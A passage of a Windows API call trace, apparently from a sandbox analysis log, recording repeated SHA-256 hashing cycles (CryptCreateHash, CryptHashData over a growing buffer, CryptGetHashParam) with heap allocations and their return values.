	[0253.221] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5968, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5968, pdwDataLen=0x128c3c) returned 1
	[0253.221] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.221] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.221] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.221] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.222] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0253.222] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.222] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5990
	[0253.222] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5990, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5990, pdwDataLen=0x128c3c) returned 1
	[0253.222] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.222] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.222] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.222] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.222] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0253.222] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.222] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c59b8
	[0253.222] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c59b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c59b8, pdwDataLen=0x128c3c) returned 1
	[0253.222] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.222] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.222] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.223] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.223] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0253.223] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c59e0
	[0253.223] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c59e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c59e0, pdwDataLen=0x128c3c) returned 1
	[0253.223] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.223] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.223] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.223] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.223] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0253.223] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5a08
	[0253.223] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5a08, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5a08, pdwDataLen=0x128c3c) returned 1
	[0253.223] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.223] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.223] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.224] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.224] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0253.224] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5a30
	[0253.224] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5a30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5a30, pdwDataLen=0x128c3c) returned 1
	[0253.224] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.224] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.224] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.224] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.224] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0253.224] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5a58
	[0253.224] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5a58, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5a58, pdwDataLen=0x128c3c) returned 1
	[0253.224] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.224] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.224] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.225] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.225] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0253.225] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5a80
	[0253.225] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5a80, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5a80, pdwDataLen=0x128c3c) returned 1
	[0253.225] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.225] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.225] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.225] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.225] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0253.225] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5aa8
	[0253.225] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5aa8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5aa8, pdwDataLen=0x128c3c) returned 1
	[0253.225] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.225] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.225] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.226] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.226] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0253.226] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5ad0
	[0253.226] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5ad0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5ad0, pdwDataLen=0x128c3c) returned 1
	[0253.226] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.226] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.226] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.226] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.226] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0253.226] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5af8
	[0253.226] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5af8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5af8, pdwDataLen=0x128c3c) returned 1
	[0253.226] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.226] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.226] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.227] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.227] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0253.227] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5b20
	[0253.227] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5b20, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5b20, pdwDataLen=0x128c3c) returned 1
	[0253.227] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.227] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.227] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.227] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.227] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0253.227] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5b48
	[0253.227] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5b48, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5b48, pdwDataLen=0x128c3c) returned 1
	[0253.227] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.227] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.227] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.228] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.228] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0253.228] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5b70
	[0253.228] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5b70, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5b70, pdwDataLen=0x128c3c) returned 1
	[0253.228] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.228] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.228] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.228] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.228] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0253.228] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5b98
	[0253.228] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5b98, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5b98, pdwDataLen=0x128c3c) returned 1
	[0253.228] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.228] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.228] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.229] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.229] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0253.229] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.229] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5bc0
	[0253.229] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5bc0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5bc0, pdwDataLen=0x128c3c) returned 1
	[0253.229] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.229] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.229] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.229] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.229] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0253.229] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.229] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5be8
	[0253.229] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5be8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5be8, pdwDataLen=0x128c3c) returned 1
	[0253.229] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.229] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.229] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.230] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.230] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0253.230] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.230] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5c10
	[0253.230] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5c10, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5c10, pdwDataLen=0x128c3c) returned 1
	[0253.230] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.230] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.230] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.230] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.230] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0253.230] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.230] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5c38
	[0253.230] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5c38, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5c38, pdwDataLen=0x128c3c) returned 1
	[0253.230] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.230] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.230] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.231] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.231] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0253.231] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.231] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5c60
	[0253.231] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5c60, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5c60, pdwDataLen=0x128c3c) returned 1
	[0253.231] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.231] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.231] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.231] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.231] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0253.231] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.231] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5c88
	[0253.231] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5c88, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5c88, pdwDataLen=0x128c3c) returned 1
	[0253.231] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.231] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.231] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.232] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.232] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0253.232] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.232] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5cb0
	[0253.232] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5cb0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5cb0, pdwDataLen=0x128c3c) returned 1
	[0253.232] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.232] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.232] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.232] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.232] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0253.232] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.232] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5cd8
	[0253.232] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5cd8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5cd8, pdwDataLen=0x128c3c) returned 1
	[0253.232] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.232] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.232] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.233] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.233] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0253.233] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.233] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5d00
	[0253.233] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5d00, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5d00, pdwDataLen=0x128c3c) returned 1
	[0253.233] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.233] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.233] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.233] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.233] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0253.233] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.233] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5d28
	[0253.233] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5d28, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5d28, pdwDataLen=0x128c3c) returned 1
	[0253.233] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.233] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.233] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.234] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.234] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0253.234] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.234] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5d50
